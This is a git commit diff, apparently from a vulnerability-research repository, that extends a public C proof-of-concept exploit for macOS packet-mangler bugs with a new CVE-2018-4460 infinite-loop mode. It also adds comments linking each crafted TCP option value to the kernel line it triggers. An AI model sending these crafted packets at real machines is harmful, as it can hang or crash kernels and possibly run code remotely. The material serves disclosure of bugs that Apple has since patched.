Add PoC for CVE-2018-4460.

kevinbackhouse · kevinbackhouse · commit 363fc68efdf0 · 2018-12-12T11:09:51.000Z
diff --git a/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md b/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
@@ -1,5 +1,7 @@
-## Remote code execution in Apple's packet-mangler (CVE-2017-13904, CVE-2018-4249)
+## Remote code execution in Apple's packet-mangler (CVE-2017-13904, CVE-2018-4249, CVE-2018-4460)
 
 Proof-of-concept exploit for remote code execution vulnerability in the packet-mangler component of macOS: CVE-2017-13904, CVE-2018-4249. The vulnerability was fixed in macOS High Sierra 10.13.5, which was released on June 1, 2018.
 
+Update: Apple's fix for the infinite loop bug was incomplete. The fix for CVE-2018-4460 was released on December 5, 2018.
+
 For details on how to compile and run this exploit, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904).
diff --git a/apple/darwin-xnu/packet_mangler_CVE-2017-13904/cve-2017-13904-poc.c b/apple/darwin-xnu/packet_mangler_CVE-2017-13904/cve-2017-13904-poc.c
@@ -57,9 +57,9 @@ unsigned short csum(unsigned short *ptr, int nbytes)
 }
 
 enum Mode {
-  InfiniteLoopMode,
-  InfiniteLoopMode2,
-  SmashStackMode
+  InfiniteLoopMode,   // CVE-2017-13904
+  InfiniteLoopMode2,  // CVE-2018-4460
+  SmashStackMode      // CVE-2018-4249
 };
 
 int main(int argc, char* argv[])
@@ -75,6 +75,7 @@ int main(int argc, char* argv[])
     printf("Usage: sudo ./a.out <source ip> <dest ip> <mode>\n");
     printf("Examples:\n");
     printf("  sudo ./a.out 192.168.0.8 192.168.0.12 infinite\n");
+    printf("  sudo ./a.out 192.168.0.8 192.168.0.12 infinite2\n");
     printf("  sudo ./a.out 192.168.0.8 192.168.0.12 smashstack\n");
     return 1;
   }
@@ -85,11 +86,14 @@ int main(int argc, char* argv[])
   dest_ip[sizeof(dest_ip) - 1] = '\0';
 
   if (strcmp(argv[3], "infinite") == 0) {
+    // CVE-2017-13904
     mode = InfiniteLoopMode;
   } else if (strcmp(argv[3], "infinite2") == 0) {
+    // CVE-2018-4460
     mode = InfiniteLoopMode2;
     printf("infinite2\n");
   } else if (strcmp(argv[3], "smashstack") == 0) {
+    // CVE-2018-4249
     mode = SmashStackMode;
     payloadsize = 1000;
   } else {
@@ -124,9 +128,13 @@ int main(int argc, char* argv[])
   memset(data, 1, payloadsize);
 
   if (mode == InfiniteLoopMode) {
+    // Trigger bug here:
+    // https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/net/packet_mangler.c#L966
     data[0] = 2;
     data[1] = 0;
   } else if (mode == InfiniteLoopMode2) {
+    // Trigger bug here:
+    // https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/net/packet_mangler.c#L993
     data[0] = TCP_OPT_MULTIPATH_TCP;
     data[1] = 0;
   }
@@ -158,6 +166,8 @@ int main(int argc, char* argv[])
   tcph->seq = 0;
   tcph->ack_seq = 0;
   if (mode == SmashStackMode) {
+    // Trigger bug here:
+    // https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/net/packet_mangler.c#L951
     tcph->doff = 0;
   } else {
     tcph->doff = 0xF;
